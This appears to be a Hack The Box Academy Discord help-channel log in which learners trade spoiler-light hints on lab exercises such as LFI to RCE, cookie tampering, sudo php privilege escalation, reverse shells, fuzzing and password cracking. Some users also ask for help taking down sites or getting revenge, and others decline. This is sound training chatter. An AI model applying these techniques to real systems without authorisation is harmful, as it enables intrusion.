#modules

Someone told me that The HTB machines give different output once decoded with base64

Than our own ones (Parrot,kali on Oracle Vbox for example)

Is this actually the solution to my problem?

The different machines?

I've been trying God knows what this half an hour or 40 minutes but I am a headbanger honestly

On the cookie manipulation I can change the name I guess

But what else?

Nah, it's same stuff

Provided box or my own

No different encoding

Aight, I am going to sleep

For now

If you know the answer but struggling in right format then it's same format as In the sub-heading in that page

I've legit bruteforced it and still haven't gotten the right answer 😂

😂 nice idea of brute forcing

Btw you got the answer now?!

Nah, I went to bed and decided to work on some hackthebox machines instead. I'm hoping when I go back and re-reading it, it will shop up. Let me know if you figure it out pls 😅

I have already done it

so im on the last section in the getting started module i got the user flag now for the root flag i need to privesc i got the user flag from meterpreter exploit the problem now is that since its a meterpreter session/shell whatever i cant run bash scripts or python3 to make it bash or wget to get linenum to that box

oh wait

shell

Well done!

i got the admin pass too

but i still dont get how will i privesc

Always good to see people figure out the solution before help is given

This is nibbles isnt it?

nibbles was before this this is some custom one ig in the last section which is knowledge check

i did nibbles

Ah. I'm not sure on that one then

oh

Have you checked what you can run as root?

yep its php

php reverse shell?

So you can do sudo php <whatever you want>?

its that easy?

I dunno. Is it

sudo php <can i put bash here>

Not bash. But if you look at what you can do with php you have lots of options available

hmmm

Its a programming language so there are lots of things it can do

Also for future reference - if you see you can run something with sudo it is worth checking a site called gtfobins.

ohk

YAYAYYAYAY

I DID IT

Yo boys please raise your hand ✋ if your doing or already done tier 0 , Getting started module , i have some doubts not for answers !

i just completed getting started

i can give hints

like i JUST JUST completed it

Alright 😄

Brother types of shells im currently right now.

which section

oh

ok

Is it really essential to learn all reverse shell commands they provided , like python , powershell commands to attain reverse shell.

not necessarily if u want u can or just save them in a folder i personally keep all hacking related files in one single folder organized with names or even htb boxes folders once u start progressing in the module ull have to use php reverse shells and i think python too

in the first starting point machine archetype we have to use a powershell reverse shell

pretty hard module

Ohh. Right , is it okay to use cheat sheets , i aint feel right using it 😬

yes thats why they are there to get reference from u cant remember the whole bible at once

Ohh so its fine to use even in exams? , I use help command sometimes when im stuck . I feel its ok but this aint.

I've been doing this for years

exams idk never gave one

and still use cheatsheets

some I know off top of my head through use, but some I just copy paste from my notes

yeah

But sometimes help or man dont gives me the thing that i was looking for. .😅🤦🏽‍♂️

why is the path cost 1k when the 2 modules inside are only 200 combined lmao

the 200 is how many cubes back you get

not the cost I think

Idk i dont feel right , while i use cheatsheets .

oh

ok

i only have 40 rn i have to convince mom to buy me more

work through all the tier0 ones first

if you are a student you can subscribe at a reduced cost

@hollow flame have you byheart other commands in reverse shell section?

nope the bash one is brainfuck to read/learn

Not only the powershell ones is way too longg 🥲

just keep all of them in a folder or something with the correct file extensions or however u wanna organize

okk ill look into it

Hmm

@hollow flame you tried making web shell?

Hey all ! How are you doing ? I kinda have a dumb question : i'm starting with HTB & am at the end of the 'Getting Started' in the "Knowledge Check" section. I kinda have no problem, i'm gained a foothold in the target and everything but the shell keeps dying on its own after I input 3 or 4 commands. Do you know how I can fix that ? Thanks for your help

If someone hasn’t already helped you, feel free to DM me.

Doing Intro to Network Analysis, section 2 (Networking layers 1-4).

What addressing mechanism is used at the Link Layer of the TCP/IP model?

I've tried MAC (address) in several forms and none works

Is it not MAC, or am I missing a form?

"-" <-- add this little guy instead of empty space between planets 😀

that works, thanks

Guys

Can someone give me a hand on the cracking into HTB path

Module 1

Section POST methods

It tells me I have to manipulate cookies somehow to gain admin_user

But I have no idea

been trying since last day

I would appreciate some additional hints

I logged in with username guest and password guest and captured cookie

One thing I noticed

The cookie on my side is auth

While on the course its PHPSESSID

I try to change its values

Most of the time the last 3-4 characters cannot be changed

But the username that is displayed after the welcome message can

Any idea if I am on the right path or guidance?

Lol I just came here with the same questions.

NICE!!!!

HAs anyone here used what they learned in the Buffer Overflow modules to earn the OSCP?

Sure, but my question is what do I need to do, in what way do I manipulate the cookie?

Like when I login, it takes me to the admin panel and says welcome guest

That's what I have been trying to figure out

have you used burpsuite before?

I converted the LFI vulnerability to RCE. But I'm a nobody user on Linux. Please give me a hint on how to upgrade this.

Aight I’m stumped

I’m on the Host and port scanning section of Network Enumeration with Nmap module

I completed the first question to find all the TCP ports, however I can’t seem to figure out what the host name of the target it

No idea where to go from there

@iron tartan pls be careful with spoilers

our flags have the following format: HTB{xxxxxxxx}

sorry, I’ll use that next time

that was actually a hint

right, translating it from l33t it seems to refer to another port service that I need to get the banner for

however I have no clue how to get it as all the ports that might be related to it are closed

read it carefully

the flag you have to submit as the answer has the following format:
HTB{xxxxxxxxxx}

I’m really good at digging way too deep

I wasn’t thinking about the question after I had gotten that flag

I still don’t understand how the flag relates if it does but

@rustic sage I gave a major spoiler in that maybe 😀 ( deleted that msg), you can dm me if you need help

Yoo someone help me out

sure with what?

Alright so yesterday I stole my little he’s 6 cousins Nintendo switch and sold it idk why and there trying to find it but couldn’t they asked me twice and I said idk where it is I’m going to there house tomorrow so they might ask me questions but my older cousins are coming from vacation on Monday and they love the switch so there gonna do some serious investigation I mean there’s no evidence it was me because no one knew where it was at but im scared I might get caught because there the real deal

yeah, that is completely irrelevant to anything we do here...

Oh

Ok than

Doing LFI module, last section. I've got index.php but don't quite know where to go next. I can't seem to use null byte to read non-php files, and wrappers don't seem to work.

can anyone teach mme hackin

++academy

Not really

Give it a go

Read the module well. It contains the answer. However, I could not read the flag. And it's been 2 days

You have rce? Then you should be able to read the flag

No RCE yet, just exfiltrated source code of index.php

I'm a nobody user in Linux. I can run various terminal commands via burp. But I think it wants me to install shell and I don't know how to do it

You should just look through the directories

Okay, I don't understand

After logging in a s admin

And clearing my cookies

I steal the cookie

And after I try to relog and when sending the POST method

I insert that same cookie

But on GET I return a different one

Why

are u talking about the WEB request post module ?

Yes on the Cracking into HTB path

I have been fighting since 2 days

With a single section

fml

I re-read the section, but I am clueless on what to do

I am experimenting

Yeah but why u insert the same cookie. Because u were trying to log as guest but when u sent the post request it shows u the guest cookie and not the admin cookie

No no

First

I log in as admin

And save that cookie

Now I will log in as guet

guest

And send the admin cookie

To see what will happen

No it's not the right way. Because u have to escalate from guest to Admin. It's too simple if it were like that

I see

heyy

So, I need to edit the cookie

?

And on base64 put admin

?

instead of guest

or

Login with the credentials (guest:guest), and try to get to the admin user from what you learned in this section and the previous section.
``` If u follow exactly what it says u will have smth. U have to login as guest and then if u intercept the request u we have that ```bash
POST /login.php HTTP/1.1
Host: 142.93.35.92:32627
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 29
Origin: http://142.93.35.92:32627
Connection: close
Referer: http://142.93.35.92:32627/login.php
Upgrade-Insecure-Requests: 1

username=guest&password=guest
``` but a little nudge. Click on the forward thing after intercept this

exactly

Why did it not work when I tried

A day ago

read what I said and u will understand

I did

I know that I have to use something in that section

Or the previous

And I did intercept the request after forwarding that

BIRBY is my asvior

savior*

@scarlet finch

Need help on buffer overflow module anyone up?

Yeah Sure

Is this code deobfuscated?

Or not?

I think it is

I need the flag on var flag and when I stitch it together it says it is wrong

How is it wrong

It is deobfuscated

Well, why is it not accepting my flag then

That's cringe again

Probably some little stupid thing I am missing

I think you should not post any flag

oke

It still does accept wrong

You submitting the flag like HTB{xyz} ? @rustic sage

Yes

Hey, I really need some help

I think something is not working

Like, I think I got the flag, but it just does not want to accept it

It's literally HTB{flag}

Never mind

All is good

This time it was my mistake

again

lmao

at least you are learning

Y

Correct my dear Agent

We all learn from our mistakes

This time I missed some signs

While stitching up the flag

anyone who could help me in the Getting started module Public Exploit section

lol that flag was for a later exercise that I just finished

I could use some direction on Windows Privilege Escalation Skills Assessment - Part I. I cannot find the requested password, nor can I escalate privileges. I tried pretty much everything explained in the course.

A problem here with gobuster. I can gobuster dns inlanefreight.com, but I cannot do the same with the ip address 188.166.173.208:31163

This is in the Academy on Pentesting Basics > Web Enumeration.

Can anyone please help me with 'Cracking passwords with hashcat'

Cracking Common Hashes section

I need help in pointing out what to do... I have tried every rule set that hashcat provides on the MD5 mode. What am I missing here? Is it not MD5? Every place I look for the hash, it points me towards MD5 but none of my cracks are finding anything. Thanks

I send you a DM.

I'm working to get a reverse shell for the Skill Assessment on the Wordpress, and right now i'm doing a password attack with the rockyou list (assuming I want to get RCE via the theme editor). Am I wasting my time, is there another way to go about it?

I am unable to connect to websites in the VPN Instances. inlanefreight.com & 46.101.23.188:31395

Anyone working on NMAP, IDS/IPS evasion Hard lab?

yup, what's the issue ?

I am currently working on File Inclusion and Directory Tranversal Module. I am stuck on one question under the "Hardening Tips" section :

I have added the system to be blocked in the php.ini file but how do I run System command in php to see if the command is blocked?

Hi guys, working on sql injection fundamental and I'm stuck in this question "Try to log in as the user 'tom'. What is the flag value shown after you successfully log in?". I've successful to log in but there is no flag in there, anyone can help me?

dm me

dm me

Can you use your own vm in HTB Academy?

@south mortar in some modules yes, not all, but the option is there when you can

@drifting knoll We need module powershell and poviting,

yes

Try to create the 'ids.txt' wordlist, identify the accepted value with a fuzzing scan, and then use it in a 'POST' request with 'curl' to collect the flag. What is the content of the flag?....I need help in this attacking web applications with ffuf module

hi,am on the "windows fundamentals" second section: "operating system structure" but i don't think i am doing the exercise right. Can anyone help

I ended up not needing to do this to get the flag. My guess is that this "bug" may have been on purpose.

I am on the final stage of Skills Assessment - File Inclusion/Directory Traversal
I need help as I am stuck, I have decoded the index file and read the php snippet code but I am stuck to were do i go from here. Can anyone help me

Hey guys, didn't know if anyone had any pointers for the ffuf section

I am value fuzzing but having a time.... I am not sure about the URL. Any hints would be great.

I have sent you a dm

Doing LFI, skill assessment. I can't include non-php files (%00 doesn't seem to work), there's no session cookie to poison, and the wrappers with code execution aren't working. I've got the code for index.php cut that's it for now. Can I get a hint?

Base64 on page <== hint

I used base64 to get index.php, the other php pages don't seem to have anything interesting

There is something read carefully

can anyone please give me some tips regarding how to solve File Inclusion skill assessment

found it url

btw is .well in scope? I don't think I'm supposed to bust it

Read the basic LFI again, the clue is there what you need to get detailed information

I yesterday spent 7 hours and eventually cracked it, but the solution was right in front of me and I was kicking myself that I should be more thorough. It felt good when I accomplished it.

Can anyone confirm some of my answers for the BloodHound module?

LFI, assessment. I'm on the admin page. I've tried all the wrappers, RFI doesn' work either. I can grab /etc/passwd but can't seem to get code execution.

In the LFI tutorial look over the basics of code execution

||lux is on fire||

hi

hey..how you doinn?

hi

any one give me some cubes??

i need some too....i completed all the modules but i want some for higher level modules

i need 10

is there anyway to connect to academy targets using my personal kali installation?

Download their academy vpn key (you will find it in any module ) and run it in your personal machine

#giveaways for a chance to win 500 cubds @vapid topaz @rustic sage

but when i try to get the /flag.php nothing comes up

I made sure i'm using backticks

and i'm kinda lost

try <?php insted of <?=

i'm going to reset the machine and try that

nope still void

i cant seem to find it

If there is no vpn pack by the questions its probably a public facing docker instance

and how do I connect to it? sorry I am very new to this

you do not need to connect to dockers

if there is "GET VPN Key".....you do not need to connect to it...use directly

dude this is not fair....we have to spend 50 cubes and then only get 10 as a result

i want to start harder levels but cannot due to no cubes

I am doing the getting started module and there is no vpn key option. i already used my workstation instance but had to leave so it expired

now I cant complete any challenges and have to wait

You can. If it is docker then you connect the same way you would with the workstation

High quality materials and labs cost money. Not everything can be free

I agree academy has some serious high quality stuff...keep em coming!!!!

There is if u can wait till tommorow morning

I'll tell

ok

Alrighty bois I've been stuck on this section for over 24 hours. I feel like I'm one mistake away from the flag, but after trying everything I know and searching everyone else's help messages, I've come to the conclusion that I need to start a new question.

Module: Getting Started
Section: Public Exploits

PLEASE help me I've exhausted every method I've learned thus far. I've looked at previous sections and reviewed information, but to no avail.
I have the ip address : 142.93.35.92:30027
I have the exploit : https://www.exploit-db.com/raw/39883

Hello, i have a problem in the fuzz module in Basic fuzzing section. I fuzzed with ffuf but i find nothing

is there a problem

because my command is exactly what the module teach me to do

||ffuf -w /opt/useful/SecLists/Discovery/Web-Content/directory-list-2.3-small.txt:FUZZ -u https://IP_ADDRESS/FUZZ||

there is no results

brother, I don't find anywhere #giveaways

Maybe the path you are trying to read is not correct

I am not sure what's wrong it seems fine but try with http instead of https (maybe 😐 because commonly http protocol is used in Academy)

Thank you very much.

This was the problem

I am not sure why it would be.
The website says "directory in the root of your WordPress directory called ‘simple-backup’ to store the backup files."

I also tried /WordPress/root/simple-backup/flag.txt.
At this point, I'm just guessing. Is there not a better way?

It's not actually setting up a shell or downloading anything from what I can tell.

Hi, I have a connection problem in the NTFS vs. Share Permissions of the Windows Fundamentals. I can rdesktop to the windows desktop without problems, but when I try to access the same IP via smbclient, I get the following error:

do_connect: Connection to failed (Error NT_STATUS_IO_TIMEOUT)

I tried from Kali Linux and Ubuntu Linux without success. Any ideas?

sudo doesn't help either..

any hints for final SQLMAP Essentials skills assessment? Am either getting an error saying factor is not injectable or error 400 bad request.

Try without wordpress and 'simple backup'
As mentioned in question path should be /flag.txt

I don't remember exactly right now but there need some tweaking in firewall, It was mentioned in module ig (possible reason 🤔)

Could anyone check 2 of my answers for the BloodHound module? I can't seem to get them through even after trying a few variations to hit the 'case sensitive' filter

Still doesn't work. Metasploit scans 1/1 hosts, executes the auxiliary module, but does not download any files.

Maybe because you are using a reading file exploit so it won't download anything , instead it might have saved the output somewhere

Shouldn't I be able to get a copy of the file that I'm reading? I'm new to this so I don't know where the output would be saved.
Everyone else I found seems to have succeeded with this exploit, along with a clear path to the file that they downloaded.

Can you dm me the screen shot after running that exploit

I already posted it above.

Here.

Not this on , one in which path is set to /flag.txt as given in question

Doing File inclusion, Skill assessment. Got to admin, tried all the wrappers & RFI, nothing works, can't poison either. Can I get a hint?

nevermind, I got it, turns out bridged adapter was not letting me connect because of some reason

oh ok i just woke up

is your issue resolved?

hi

Im here becuz my server got hacked they banned all the 50 members and i want revenge

hi can anyone help me out

i get this error when i run the command on my setup but on pwnbox it works fine?

on your setup...you should be connected to the vpn of academy...on pwnbox it is not required

I think I had this problem I think it was that the server was busy. You can try using dirbuster

Doing SQL injection, section "union clause". It's telling me to connect to the mysql db but doesn't provide cresd, root:password doesn't seem to work.

Not a hack for hire server dude. Contact discord support

Bump again

can someone help me out on the sqli academy part? I have already bypassed with 'or 1=1-- and I have looked through every single database and every single important table and column and all its information and I can't find the flag. Unless if im supposed to get the flag by doing something else other than accessing the databases information, i don't know. I am so confused

this is the real life example, the last part of sqli topic

Can anyone give me a little nudge Module : Network Traffic Analysis
Q: what is the filename of image that contains Transformer Leader!
In the hint it listed some files which should have been pulled
But I can't found any of them

hello, is it possible to do the ffuf skill assessment from my own vm. I can't seem to resole the academy.htb with my own box. I've added the ip to my /etc/hosts.

nvm I see that I can, guess I was just having trouble with it last time.

Hashcat module wifi lecture: is the mic.hccapx supposed to be cracked using rockyou.txt? It got exhausted, tried many dict/rule combinations, or am I messed sthing up? My cpu is melting... 🙂

yes it is possible

use correct wordlists with right path

yes its working for me today. yesterday it would not resolve

goof

good

Assess the web application and use a variety of techniques to gain remote code execution and find a flag in the / root directory of the file system. Submit the contents of the flag as your answer.

this is the final question on file inclusion module...plz help

Thank you! Oh my god, it's written there super clearly, I guess it was too late for me yesterday...

No.

I tried changing the networking type on VirtualBox from NAT to NAT Network and Bridged Adapter, but to no avail.

hey anybody know how can i take down websites and thinks like that

i could use that with my current job

how do you mean?

Hi, can somebody help me with the Skills Assessment of the Windows Fundamentals? It says "Create a security group called HR". I found out how to create a group, but where is the option to make a "security group"...? When I try to google, I only get results for Active Directory, Azure and so on...

OK, I guess I was overthinking. In the end i solved all questions with the group I created...

What channel can I ask a queation?

Question about what?

It's been 48 hours and I am still unable to access the flag.txt file. During port scans I found an open port 31337, but duplicating my efforts on that port proved fruitless.

At this point, I would very much appreciate a direct walk-through for Module: Getting Started, Section: Public Exploits.

I believe that there is an unforeseen bug in my system, as I have already read all previous conversations about this section and had a private dm to no avail.

what are the best module i should go through to become a good pentester?

Use support chat on the main site

Start off with getting started and introduction.

I am stuck on Network Traffic Analysis [Packet Interception Wireshark] , how long should I capture traffic ? Since I am not able to a find a file which is asked

anyone who've completed the hashcat module? I could use a nudge for wifi section.

So, i was looking into Hackthebox.eu Linux Fundamentals, but i'm out of VM Spawns. Do i need the VIP+? Or is it possible the run the VM on my own computer with VB?

you may call it a day, to get a fresh spawn, or you can create a hacking installation of your own, so you can connect from there

What iso would you recommend?

Install any pentesting distro

htb recommends parrot, however, I use kali live usb with persistence, so I did not need to erase my fedora workstation

Connect via vpn thats it

More speed much reliable

I'll check it out @crude kettle

You'll learn how to connect via vpn in Getting Started module

@crude kettle Cool thank you!

@tribal remnant Ah oke

@abstract hollow

in the meantime I'm still struggling with the mic.hccapx, the pmkid was successfully cracked with rockyou, but the mic pw isn't there... could any1 give a clue, where I messed up and what? I'm stuck I'd say.

Does HTB not have a vpn for academy?

thanks

When when is needed there is a key on the academy page. Otherwise the target instance is a public facing docker container and no VPN is needed.

Where on the page, I read that you should have a get vpn key link on the module page down where the questions are, next to the Cheat sheet one, but its not there for me

If there isn't a VPN key on a given page, none should be needed to complete the content on that page.

okay yeah, I realized that ive been looking at a page on the module where I need to do something on my linux rather than something to a target, hence the reason no vpn key, thank you for helping me realize

No problem. Happy hacking!

Good day everyone! I'm having some issues understanding what am I doing wrong in the Windows Fundamentals module. I'm in the part in which you need to configure SMB to share a folder between the PWNBOX and a Windows machine. I've followed all steps in the module but still I haven't managed how to mount the folder.

Can anybody help me please?

I can't even ping the target machine :S

Buona sera!

SQLMAP Essentials

What's the contents of table flag4? (Case #4)

I have saved the req headers to a file added the json payload, and am running sqlmap with -r flag on the file, but not getting anywhere with it.

[CRITICAL] all tested parameters do not appear to be injectable. 

plz halp

dafuq? @urban sage @jaunty axle @languid fjord

thanks

++Rm @forest temple 666w spam

sure thing

DreF has been banned for a duration of 666w for "spam"

thanks for letting us know

dm

hey anyone who could help me with the internet speed issue on my virtual box it's super slow in the guest os but everything runs smoothly in the host os?

possibly some change in the settings might help me

I cannot connect to the Windows machine in the Windows Buffer Overflow room. I've entered the correct credentials, but not luck

Tried resetting the target, still no difference

I'm trying to use WPScan on a target for the hacking wordpress skills assessment but I'm getting the message that "The remote website is up, but does not seem to be running WordPress". running --force didn't work either. Has anyone run into this?

Either I'm doing something terribly wrong (very possible) or the wp-content directory doesn't exist on this wordpress skills assessment.

THX man

Doing File inclusion, skill assessment. I'm on the admin page, and I'd like some sanity check seeing as my RCE isn't working.

hey anyone here for linux module which i dont know what im doing wrong

Hi can anyone help with the Windows Fundamentals - Skills Assessment final question? I am having trouble getting the correct SDDL string. Here is my powershell output. I have followed the steps in setting permissions on the folders but am unsure what the issue is.

PS C:\WINDOWS\system32> Get-Acl -Path 'C:\Users\htb-student\Desktop\Company Data\HR' | Format-List

Path : Microsoft.PowerShell.Core\FileSystem::C:\Users\htb-student\Desktop\Company
Data\HR
Owner : WS01\htb-student
Group : WS01\None
Access : WS01\HR Allow Modify, Synchronize
Audit :
Sddl : O:S-1-5-21-2614195641-1726409526-3792725429-1002G:S-1-5-21-2614195641-1726409
526-3792725429-513D:PAI(A;OICI;0x1301bf;;;S-1-5-21-2614195641-1726409526-3792
725429-1004)

i dont know what im doing wrong here guys any help

i found the probelm sorry

Would you happen to still need assistance with this?

yes i sure do!

Feel free to DM me

okay

Is there really no vpn file for getting started priv esc? I’m unable to upload linpeas to the docker box with wget/python or use bash to get the reverse shell to my external ip. I’ve done both these things many times on htb being connected to the vpn and using my 10.10.x.x ip. But with no vpn/tun0 connection all I have is my external and 192.168.x.x which it’s not going to see.

I am stuck on that too

Has anyone else had problems with pwnbox/vpn file for ssh ing to target machine, I keep getting timeout messages? Also tried both using pwnbox or vpn file, same result.

Yes I have encountered this problem

You try downloading new that vpn file again and use openvpn to that vpn file.

Yeah, tried redownloading, restarted my computer, tried pinging the target host (no reply), it's weird

I had problems with VPN. Using UDP instead of TCP solved it

When downloading your VPN file, use UDP instead of TCP

@unkempt marten cheers contacted support, they were able to solve it!

SQLMAP Essentials - Skills Assessment

I have the final_flag, but htb wont accept it. Are there multiple final_flags?

hey

im doing the JAVASCRIPT DEOBFUSCATION and im at part decoding

i allready got the decoded the thing i needed but for some reason it doesn't accept it

any guess?

this is the question
To get the flag, you can send a 'POST' request to 'serial.php', and set the data as "serial=YOUR_DECODED_OUTPUT".
but even if i enter my answer as mention like serial=decoded_stuff i get incorrect answer

Is there anyone willing to help me with a module

@clever imp Should be only one, need help with it?

In the end I got help. It was really strange. My final_flag had one character diff. Not sure why.

But thank you!

took me like a hour or so to get that flag 😄

We need module powershell

probably one in the works

anyone else noticed this....

Not available

yeah, it wouldn't be available until it was finished

40 %

my account

is there any way to do the modules on your own linux ?

Yes, using the VPN provided within the modules to connect to the lab.

where was that

Hey, does anyone know when the modules in the junior penetration tester path will open up?

@proven jay gotta have patience, they'll be open when they are ready, I'm sure dev team are doing best they can to make it avaible asap

Also super glad to broaden my skills with that path, academy is incredible place indeed

The rest should be released soon

Not sure on exact timeline but looks like some cool modules coming

when

No idea.

We are working to get them out as soon as we can.

Module: Windows Privilege Escalation; Communications with Processes; “Which account has WRITE_DAC privileges over the \pipe\SQLLocal\SQLEXPRESS01 named pipe?”

Not sure how to do it without the accesschk.exe, it’s not there on the box

Split the network 10.200.20.0/27 into 4 subnets and submit the broadcast address of the 2nd subnet as the answer.
Can any one explain this question?

Total number of hosts = 2^(32-27) = 2⁵ = 32
We have to divide it into 4 subnets
32/4 = 8

Therefore we are dividing 32 hosts into 4 subnets where each subnet have an IP Address range of 8
1st 10.200.20.0 - 10.200.20.7
2nd ....
3rd ....
4th .....

Thanks, help a lot,....

Can I dm someone who can help me in File inclusion skill assessment or the last question of the module?

It is easy moudel

I am struggling in last question.

All the things you learned in module, equal to assessment skill

I know you need found flag

Apply all the steps you have learned

You do not need to think a lot, if I give you the solution, you will not benefit anything, so repetition helps to consolidate the information you have

Hello i am kinda stuck on the Public exploits module to get the flag of the Wordpress website using the simple backup plugin exploit

Okay man @jagged zenith thanks for help, let me give it one more shot.

i have tried using various metasploit exploits but to no avail, i have also looked into others that i found on the web, like executing php code from the URL to download a file but, the file comes out empty.

The solution is found in the things you learned in the section. Falling into error is not the end of the world, but the beginning of success

Sorry I didn't work on this section

thanks anyway 🙂

I work on the free sections

i bought it with the 50 free cubes they give you

I know, but the currency of my country, is too cheap for me the euro or the dollar

WordPress 100 cubes

it is not in the wordpress one, it is in the Pentesting basics module

I need to work for a whole month on hard work, for 100 Cubes

Name module ?

Getting Started?

yep

Name section

public exploits

Or use wpscan

kek @languid fjord ^^

++rm @rustic sage 666w phish

DaGoN1984 has been banned for a duration of 666w for "phish"

Should be, i believe in C:\tools

hi, i'm at the "OSINT Corporate Recon" module, section "domain structure". I'm stuck at the question about the hosting provider - I'm quite sure I've found the right one but somehow it doesn't accept the name, can somebody please help me?

hello!
I've got a problem with one task in Hacking Wordpress - Skills Assessment.

I got everything but "Use a vulnerable plugin to download a file containing a flag value via an unauthenticated file download.".
Do you have any tips which file includes a flag, because i can't get it?

Searched the whole filesystem for other flag files. Nothing.

Grep searched the whole filesystem for files containing 'HTB'. Nothing.

Manually went through /plugins/ folder hoping to find that file that contains the flag. Nothing.

Will check, thank you!

Hi, I'm working on the module "Login brute forcing", and I'm on the final section. There is a mention of an employees username, I can't figure out what they are talking about. Am I missing something obvious, or are they talking about bill and melinda gates from a couple sections before

anyone available for a nudge on Windows Privesc - Interacting with Users?

In JavaScript Deobfuscation - Decoding, if I send a POST with the serial through the Repeater in Burp I get the standard message, but if I do exactly the same through cURL I get the correct flag.

Can someone explain me why the difference?

I tried to find out the answer through Google and what I can guess is (because I wasn't able to find an exact answer) it has something to do with user agent curl uses default user agent ==> curl/<version>
But burp must be using default browser user agent
I you found any lead tell me too !!🙃

someone please give some hint regarding the File inclusion skill assessment. I have tried this exercise many times now but haven't any progress

• Wrappers
• Read Carefully
• hidden Treasure 🪙
• basic what you have learned

Hi all, I need little help on the GET module (I know very easy and for noob only eheh) the qestion is"Send a GET request to flag.php with two parameters num1 and num2 such that their sum is 1337." I tried with "http://admin:password@xxx.xxx.xxx.xx:xxxx/flag.php?1000&337" with all the variants That came in my mind, but nothing, I really don't understand what I do wrong...

You found someones name in the previous step. Make potential usernames based on that

@round hill i dont see param num1 and num2 in your request. Have another read of the section and look at the requests closely

I thougt I have to put numbers instead of num1 and num2! what dumb am i! ehehe okok I'll try. thanks a lot for the hint

So I did find it, ran it and it’s asking for what specific account but the only thing it populates with is WRITE_DAC under “RW NT SERVICE\MYSQL$SQLEXPRESS01”

@surreal rain

what is the question again?

Under windows priv escalation : “Which account has WRITE_DAC privileges over the pipe\SQLLocal\SQLExpress01 named pipe”

The command I run:
accesschk -accepteula -w \pipe\SQLLocal\SQLExpress01 -v

pm me a screenshot

Has someone done the linux privilege escalation module? I'm kinda stuck at last flag

Hi on Hacking Wordpress module I'm stuck on skills assessments. To identify wordpress version number. I ran wpscans it shows that website does not run on wordpress. so I start try nmap to scan the ports but I see only 2 ports opening 22 ssh, 80 apache. Does anyone can give me some suggestion?

Looking for a nudge on Windows Privesc - Interacting with Users if anyone is available 🙂

Hello all , Guys I am new here, I would like to learn hacking, can any one plzz, let me know how and where to start in the server, because I am unable to see any resource for learning, some help would be useful, Thanks in advance

log On to HTB Academy

oke

Academy

++academy

tell your cousin he's a booboohead and owes me a Coke

what?

Given the capture file at /tmp/capture.pcap, what tcpdump command will enable you to read from the capture and show the output contents in Hex and ASCII? (Please use best practices when using switches)

am I incompetent

-Xr /tmp/capture.pcap

I tried so many variations

and still cannot get the answer

Does someone know it?

this question is part of the Network Traffic Analysis module

Tq

I’ve just signed up for the academy and subscribed then found that a few of the modules on the junior pen route aren’t actually available yet, any idea when they will be?

mate, we all don't know. It's the team that makes them that know.

We just have to wait and be patient.

Are none of the team on here?

on ffuf module: subdomain fuzzing does not give any results even though the subdomains are in the wordlist - is the command wrong? it's the same as given just other hostname

ffuf -w /opt/useful/SecLists/Discovery/DNS/subdomains-top1million-5000.txt:FUZZ -u https://FUZZ.hackthebox.eu

oh I wrote lowercase nvm

anyone here to help me with a module?

im having an issue with Skills Assessment - WordPress last assement when i spawn a new ip i don't get a WordPress website but a normal apache website

Try to put all the command, including sudo tcpdump

Yeah I got that, thanks anyways

hi everyone, I still need help on the GET module; I'm really stuck and I can't understand what I'm doing wrong: the question is to send a GET request to a flag.php (of a gave target I supposed) with two parameters, num1 and num2 and the sum of them must be 1337, so i write http://admin:password@xxx.xxx.xxx.xxx:xxxxx/flag.php?num1=1000&num2=337 and it gaves me incorrect answer. Now, I know is easy and probably is a really stupid question but are like two days I'm on it, I readed the module 10 times and studied external resources and I can't understand what I'm doing wrong. Could somebody please explain me what am I doing wrong?

btw thanks everyone I'll keep trying

i am having the same problem here, i have been trying different things maybe i am missing something but i dont really know what do to if the WPSCAN says it is not a wordpress website

Is there anyone who had solved the HTB academy's "Skill Assessment -File inclusion / Directory Traversal" ??

Can anyone please explain to me, why is written as ".conf" and not "config" when the question ask "What is the name of the config file that has been created after 2020-03-03 and is smaller than 28k but larger than 25k?". And what was the "." for.

Hi, it is because in Linux, config files usually end with ".conf", for example "apache2.conf". If you try "locate *.conf" in Kali you will get lots of results.

I am stuck at that too

Didn't anyone solved yet ???

This really help, thank you so much!

i dont think so

New moudels when

@jagged zenith u excited huh

Yes

I am too, but we need to have patience 🙂

finished

Huzzah! Well done!

I have some cubes i want subscribe new moudels

Congrats! We are getting modules out as fast as we can!

@surreal rain Thanks for all the hard work and effort you're putting for these new modules! I'm not sure if this has been ever discussed before or is there channel for suggestion but would it be possible to create a module for like enterprise networks?

I appreciate the kind words, however, I'm a very small part of a team. What would be some things you would be interested in seeing in such a module?

I was thinking like basic enumeration (How to approach enterprises, how does it differ from single machines, several flags and then getting to root)- close to what Dante and pro labs have so that people would have more practical aproach in academy and thanks to that knowledge that they get from academy, could be beneficial in HTB as well or even career wise.

Check this out 😉 https://academy.hackthebox.eu/module/details/133

If you are curious about modules in line for release, head over to https://academy.hackthebox.eu/modules/locked and filter on "Coming Soon"

Oh, didint even notice that, mrb3n was step ahead of me 😂

Sweet thanks!

haha no worries!

I second daylan, you guys are effing incredible

I learned more here in a month than 4 years of college

its still confusing!

Why am i not allowed to write in general?

++tryverify

To talk in other channels you need to verify yourself first:

1. Send ++verify in the #bot-commands channel
2. Follow the instruction you will receive in PM (i.e send ++identify <Account Identifier> directly to the bot
   (The instructions are available in the #welcome channel)

Could somebody help me with value fuzzing?

Try to create the 'ids.txt' wordlist, identify the accepted value with a fuzzing scan, and then use it in a 'POST' request with 'curl' to collect the flag. What is the content of the flag?

After narrowing down the key, I get a page that tells I dont have access to read the flag.

anyone can help a newbie?

what's the question?

I have my own problem btw

I know all 4 subnet ranges because I obviously got the first answer correct, but for some reason it's marking the bottom answer as wrong even though I wrote it in the same format

been trying many things for the past half an hour now

oh I'm so dumb, it asks for the broadcast address 🤦‍♂️

nvm, i thought it was asking for the network address

you don't need to post screen grabs showing you've done it 😉 we can take you at your word. Well done

ok, noted

Hey guys is there really no way to pause a session once you’ve spawned a vm instance? I’m on the free tier so only get one spawn a day but terminating the instance and resetting don’t do it. Should I just log off and I’ll still be able to retain the time I have left

I'm not sure. I've found it best to use my own VM

that way I'm not restricting in time

yeah, I use Kali Linux VM for such stuff

What if you’re not given the username and password to ssh into

I’m going through the nibbles walkthrough and I need way more time than alotted

not sure where to ask this, but let's say I want to learn shell scripting, is it better to learn Windows PowerShell or Linux bash? if both, which one do I start with?

